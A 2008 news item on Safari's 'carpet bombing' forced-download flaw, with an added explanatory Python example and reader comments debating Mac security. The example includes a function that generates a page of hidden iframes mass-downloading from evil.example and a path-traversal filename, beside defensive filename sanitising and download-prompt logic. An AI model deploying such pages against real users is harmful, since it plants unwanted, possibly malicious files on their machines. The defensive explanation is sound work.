Safari 'carpet bombing' exploit could be serious
A zero-day vulnerability in Safari that could litter a user's desktop (or downloads folder) with arbitrary files is a serious security flaw, argues ZDNet, and not a mere "annoyance" as Apple claims. All a user need do is click a link to a malicious website, which can then begin downloading arbitrary files (including applications) to the user's computer without permission. The problem affects both the Windows and Mac versions of Safari.
Researcher Nitesh Dhanjani reported the flaw to Apple, which promised to patch it in a future release of Safari. ZDNet and StopBadware.org contend, however, that a patch should be released immediately.
It's old advice, but it bears repeating: be careful of the links you click, and know where they go before you click them.
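The mechanism the article describes, as an added example (this is not code from the article, from Apple, or from the researcher's report): a page that forces several downloads at once, and the checks a download handler should apply to such a response before writing anything to disk. The hidden-iframe page and the `Content-Disposition: attachment` header are the standard way a server pushes a download and are assumed here as the mechanism, not taken from the article; the hostname and filenames are made up.

```python
"""Forced downloads and the browser-side checks they call for.

Added illustration, not code from the article or the researcher's write-up.
Assumes only what the article states: a site can make the browser save files
without asking. The hidden-iframe page and the Content-Disposition header are
the usual way a server forces a download (RFC 6266) and are an assumption
about mechanism, not something the article describes.
"""
import re
from typing import Optional

# --- attacker side: what a "carpet bombing" page could look like -----------

def attachment_response(filename: str, body: bytes) -> dict:
    """Headers a server sends to push a download instead of rendering the
    body. The suggested filename is entirely attacker-controlled."""
    return {
        "Content-Type": "application/octet-stream",
        "Content-Disposition": f'attachment; filename="{filename}"',
        "Content-Length": str(len(body)),
    }

def carpet_bomb_page(download_url: str, count: int) -> str:
    """HTML that embeds the same forced-download URL `count` times in
    zero-size iframes, so each one becomes a separate unsolicited file."""
    frames = "\n".join(
        f'<iframe src="{download_url}?n={i}" width="0" height="0"></iframe>'
        for i in range(count)
    )
    return f"<html><body>{frames}</body></html>"

# --- browser side: what a download handler should check ---------------------

_FILENAME_RE = re.compile(r'filename\s*=\s*(?:"([^"]*)"|([^;\s]+))', re.I)

def suggested_filename(content_disposition: str) -> Optional[str]:
    """Extract the filename parameter from a Content-Disposition value.
    Returns None when the header does not request an attachment."""
    if not content_disposition.strip().lower().startswith("attachment"):
        return None
    m = _FILENAME_RE.search(content_disposition)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)

def safe_download_name(suggested: Optional[str], fallback: str = "download") -> str:
    """Reduce an attacker-supplied filename to a plain leaf name:
    no directory components, no hidden-file prefix, no control characters."""
    name = suggested or ""
    name = name.replace("\\", "/").split("/")[-1]          # drop any path part
    name = "".join(ch for ch in name if ch.isprintable())  # drop NUL, CR, LF
    name = name.lstrip(". ").strip()                       # no ".hidden" names
    return name or fallback

def download_decision(headers: dict, user_initiated: bool) -> tuple:
    """One sensible policy (assumed, not Apple's actual fix): render inline
    content; save a download the user asked for; prompt for any download the
    page triggered on its own. Returns (action, filename)."""
    suggested = suggested_filename(headers.get("Content-Disposition", ""))
    octet = headers.get("Content-Type", "").lower() == "application/octet-stream"
    if suggested is None and not octet:
        return ("render", None)
    name = safe_download_name(suggested)
    return ("save" if user_initiated else "prompt", name)

if __name__ == "__main__":
    # Constructed sample: a deceptive name that also tries to escape the
    # downloads folder. The hostname is made up.
    hdrs = attachment_response("../Desktop/My C0mputer.exe", b"MZ")
    page = carpet_bomb_page("http://evil.example/dl", 50)
    print(page.count("<iframe"), "unsolicited downloads in one page load")
    print(download_decision(hdrs, user_initiated=False))
```

The sanitiser only removes path and hidden-file tricks; a name like `My C0mputer.exe` is still deceptive after cleaning, which is why the policy prompts on any download the user did not initiate rather than trusting the name alone.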
If everyone is so worried, then they could just download Firefox or Opera...
June 01 2008 at 7:46 PM
Average Mac users are not dumb enough to give admin access to apps when they don't know WTF they do.
Our operating system is deceptively simple. That by no means connotes that it engenders an OS that is prosaic in its security design.
Let's not forget that this is Unix we are talking about. Whatever Apple has done to make it look prettier, it's still friggin' *nix.
Windows is still DOS... Yeah, I went there. That's precisely why it still sucks.
Furthermore, kiddies, your little admin account ain't root. You get that? All you morons, including the author apparently, don't know enough about Mac security to take into account that root has to be enabled. You can't do it with your "user name and password".
Guess what, humans? The admin account is not system; root is. Admins can't hose the system completely. Admin is not the god account.
So, knowing this, especially if one does not know the system that well, why on Earth would one just go ahead and let an unknown do what it wants?
You see, old-school Mac users aren't falling for it. We never did. New Mac users coming from Winblows really aren't going for it because of the bad taste micro$atan left in them. Linux users coming on board are just like Mac users - they have brains.
Who is left? Yeah, that's why Apple is not putting this on the high priority.
Our lesson for today, n00bs, is: stop the FUD and just admit that OS X is the superior OS. To what? To all of them.
One more thing. You might want to Google my name and read up before any of you decide to match wits with me. I'm right about all this. The discussion is over.
...end of line
Yes, the old-school Mac users and the experienced Mac users are unlikely to click on programs that magically appear on the Desktop. But I bet that many new users (whether or not they have used Windows before) will! Apple is marketing Mac OS X not only to the experienced power user but also to the average inexperienced consumer.
And yes, if there are no "root escalation exploits" available and known to the hacker, then yes, running a malicious program that magically appears on the Mac OS X Desktop will not be as dangerous as a malicious program launched under root (which is rare under Mac OS X).
But there have been "root escalation exploits" in Linux, BSD and Mac OS X in the past, which do eventually get patched (if Apple and the Linux devs know about them). You don't need to have the root account enabled or set up with a password for these exploits to work. If the program initially run under a regular user account takes advantage of a "root escalation exploit", it will run as root and can do anything to your system.
No commonly available desktop OS is perfectly secure even if you don't run as root or an admin account.
But you are MORE secure if you never run as root or under an admin account. Most of the previous really dangerous Mac OS X exploits were only available to hackers if the user was running an admin account.
Don't surf the net with an admin account, and especially do not surf under root. And do not click on links in emails from people you do not know. I just wish more users would do that.
It just doesn't work - at least not the way they describe it. If you have multiple CGIs in iframes, Safari just shows the text "access not available"... so CGIs don't download automatically. But Safari loads, like every other browser, specific files like .dmg's or .zip's (or server-side pushed downloads) - so what's the big deal? That works with Firefox and all other browsers too. Don't get it.
May 31 2008 at 3:58 AM
Wasn't this part of a two-part problem from a little while ago?
The second part had to do with the fact that Safari does not notify the user when a hyperlink executes local code.
So, the user could then click on a link that executes the code that was just downloaded.
I would assume that Mac users would get the downloaded-application dialog; however, would Windows users get something similar?
Most browsers execute code when you visit a website without any user interaction. E.g. most browsers (like Safari and Firefox) are configured to execute JavaScript automatically. If there is a flaw, you could be "pwned".
And yes, normally when you download a file using Windows or the Mac you are presented with a download dialog box. But whether you see it when you visit a malicious website depends on the exploit being used by the website. If you are vulnerable to an exploit that allows the website to download files behind your back and the website is using that exploit, well, you won't see a download dialog box!
In the end, all I can say is that, after more than 20 years of using a Mac every single day, I have never seen a single Mac exploit of any kind--not one. Nor have any of the hundreds of other Mac users I have helped in all these years. I can't be the only one! I realize that Windows users find it comforting to tell themselves that Macs are just as vulnerable as PCs, but it simply isn't true.
May 30 2008 at 4:18 PM
Well, the main reason why you have not seen many exploits on the Mac relates to profit. Most exploits these days are being used to make $$. It is not worth it for malware developers to make $$ off exploits in the Mac. Since there are so many more Windows PCs, it makes more sense to target that machine and develop malware for Windows PCs. But since the market share for the Mac has gone way up in recent months, that may change.
The main vectors for an exploit are vulnerabilities in web browsers and multimedia players (e.g. Flash, RealPlayer, QuickTime). Most browsers (including Firefox and Safari) are configured to download and RUN code automatically (e.g. JavaScript) and plugins automatically (e.g. Flash, which then downloads and runs Flash content, which could be malicious) without any user intervention. If there is a vulnerability in the browser (and there has been, even on the Mac), one can "pwn" or take over your computer if you just visit a web site. (E.g. the early jailbreak software used a flaw in Safari on the iPhone to run jailbreak software. You just had to visit the jailbreakme website with your iPhone to jailbreak your phone!)
An awful thought but that is the truth. When MS, Apple and Linux devs are informed of these exploits, they get patched. My big complaint is Apple is one of the slowest to patch exploits.
P.S. Even my 91-year-old client (who frequently clicks links he shouldn't be clicking) has the good sense to call me when he sees a new icon he doesn't recognize on his Desktop. It's not that it's impossible for a malicious program to do damage on a Mac; it's that, before this can happen, the user has to make a series of really stupid mistakes that no one with half (or even a quarter) of a brain would make.
May 30 2008 at 1:05 PM
"Even if the program does NOT require administrative rights, it can do a LOT of damage (like deleting all the files, photos and music in your home folder!)." --RobK
What are you smoking, dude? What you have just said is sheer nonsense. Programs can do nothing unless the user (after being dumb enough to visit a malicious website to begin with) actually LAUNCHES an offending program. There is no such thing as a program that downloads itself, then launches itself, on a Mac. Not to mention the fact that, if you are using Safari, it warns you when you attempt to launch ANY program that was originally downloaded from the internet. There is no foolproof protection against terminal stupidity.
Of course the user must click on the application to take advantage of this particular exploit. But many users are frankly stupid.
The worst exploits download code and automatically run it. They do exist. Look at the Safari exploit that was used to take over a MacBook Air running Leopard during a $10,000 pwn-to-own contest. (See http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9078399&source=rss_news10 )
All the user had to do was click a link in an EMAIL, which took Safari to a website containing the code. The code was run AUTOMATICALLY and the Mac was taken over. The user only had to click a link in an email or visit this malicious website. Nothing more.
Get your head out of dreamland. Macs are no different from Windows PCs or Linux boxes. If there is an exploit that allows automatic "arbitrary code execution", you could be in trouble.
The real solution is a change in user behaviour. Do NOT click on links in EMAIL especially from those you do not know. etc.
So, suppose you end up with an icon that says "My C0mputer" on an XP machine, and then, wanting to access that area, you click on it without much thinking: My C0mputer.exe is executed and does whatever it wants. That wouldn't be a minor annoyance.
May 30 2008 at 9:20 AM
If you go to execute one of these files, it still pops up that standard warning "This file came from a website. Are you really sure you want to run this FREE PR0N HOTTIE HOTTIE YOUNG TEEN FARM SEX viewer, you dumbass." (paraphrased ;) ) along with the link to the website, right? If so, I'd still class that as a nuisance; the worst it is is a waste of my bandwidth and HD space [till I get around to my periodic cleaning of the Downloads folder].
May 30 2008 at 6:55 AM
The author's characterization of this as "arbitrary desktop write access" is pure nonsense.
One of the reasons I prefer Safari is for the way it handles downloads. And I, like most people, configure Firefox to automatically download known files (like .zip files) as well. Therefore, an option to prompt before download simply doesn't solve anything.
Stealth download is a problem that has been around as long as web browsers have been around. It cannot be handled at the browser level, which is why Microsoft and Apple now handle it at the OS level.
There are endless ways a web site can be annoying to the point that you must quit your browser. "Carpet Bombing" is just another of those annoyances, and it affects *all* browsers. What's more annoying: a download folder full of files, or an endless parade of download confirmation prompts that would require you to force-quit your browser?